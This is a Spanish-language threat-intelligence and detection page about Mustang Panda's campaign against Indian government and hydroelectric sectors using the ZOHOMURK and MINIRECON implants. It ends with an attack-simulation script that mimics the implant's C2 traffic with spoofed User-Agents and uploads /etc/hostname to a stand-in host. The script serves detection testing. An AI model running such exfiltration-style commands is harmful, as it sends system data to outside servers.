SOC Prime Bias: Alto

06 Jul 2026 21:57 UTC

Mustang Panda utiliza ZOHOMURK y MINIRECON contra los sectores gubernamental y energético de India

Author Photo
SOC Prime Team linkedin icon Seguir
Mustang Panda utiliza ZOHOMURK y MINIRECON contra los sectores gubernamental y energético de India
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Mustang Panda está llevando a cabo operaciones de espionaje dirigidas al gobierno de India y a sectores hidroeléctricos. El grupo está utilizando un kit de herramientas de malware actualizado que incluye SHARDLOADER, MINIRECON y ZOHOMURK. Una de sus técnicas notables es el abuso de Zoho WorkDrive para comando y control y exfiltración de datos.

Investigación

Acronis TRU identificó dos campañas paralelas que usaron señuelos de spear-phishing con temáticas sobre la cooperación India-Taiwán. Los investigadores encontraron la carga lateral de DLL a través de binarios legítimos de Solid PDF Creator y analizaron los nuevos implantes ZOHOMURK y MINIRECON. La investigación también se llevó a cabo en coordinación con CERT-In para apoyar acciones defensivas.

Mitigación

Las organizaciones deben monitorear la actividad inusual que involucre plataformas en la nube, especialmente el uso no autorizado de Zoho WorkDrive. Las soluciones EDR y XDR deben ajustarse para detectar la carga lateral de DLL y persistencia sospechosa basada en el registro. También es esencial tener visibilidad en procesos no-navegador que hagan conexiones HTTPS o WebSocket a servicios en la nube.

Respuesta

Si se detecta esta actividad, los sistemas afectados deben ser aislados inmediatamente para detener más exfiltración a través de APIs en la nube. Los investigadores deben realizar un análisis forense en rutas de staging como C:ProgramDataIDMlogs or %LOCALAPPDATA%MicrosoftVaultCache. Las claves del registro Run y las tareas programadas también deben revisarse para detectar persistencia no autorizada.

Flujo de Ataque

Ejecución de Simulación

Requisito previo: El Chequeo Pre-vuelo de Telemetría y Línea Base debe haberse aprobado.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntan a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico erróneo.

  • Narrativa de Ataque y Comandos: El adversario ha establecido exitosamente un punto de apoyo y está intentando iniciar comunicaciones de Comando y Control (C2). Para hacerse pasar por tráfico comercial legítimo, el implante ZOHOMURK intenta comunicarse con su controlador simulando llamadas de API de Zoho WorkDrive. El atacante usa una cadena de User-Agent específica y codificada (Zoho Client/1.0) para pasar a través de ciertos filtros de red, esperando mezclarse con el tráfico legítimo de productividad en la nube. Esta acción generará una entrada de registro de proxy que contiene el User-Agent objetivo, activando así la regla de detección.

  • Script de Prueba de Regresión:

    #!/bin/bash
    # Simulación de C2 de ZOHOMURK mediante suplantación de User-Agent
    # Objetivo 1: Imitación de Zoho Client
    echo "[+] Simulando ZOHOMURK: Zoho Client/1.0"
    curl -A "Zoho Client/1.0" http://example.com/api/v1/sync
    
    # Objetivo 2: Imitación de IPFetcher
    echo "[+] Simulando ZOHOMURK: IPFetcher/1.0"
    curl -A "IPFetcher/1.0" http://example.com/checkip
    
    # Objetivo 3: Imitación de User-Agent de POST Multipart
    echo "[+] Simulando ZOHOMURK: Multipart POST"
    curl -X POST -A "Multipart POST" -F "data=@/etc/hostname" http://example.com/upload
  • Comandos de Limpieza:

    # No se crean artefactos persistentes en el sistema mediante esta simulación basada en red.
    # Simplemente asegúrese de que no haya procesos de curl en segundo plano ejecutándose.
    pkill curl